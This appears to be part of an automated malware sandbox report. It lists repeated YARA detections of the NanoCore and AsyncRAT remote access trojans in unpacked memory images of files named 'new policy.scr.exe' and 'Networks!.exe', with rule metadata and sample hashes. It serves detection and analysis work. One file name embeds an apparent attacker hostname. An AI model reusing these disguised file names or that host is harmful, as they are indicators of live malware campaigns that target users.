Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.0.airlineagancy.casacam.net 7076.exe.280000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.new policy.scr.exe.3252f80.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
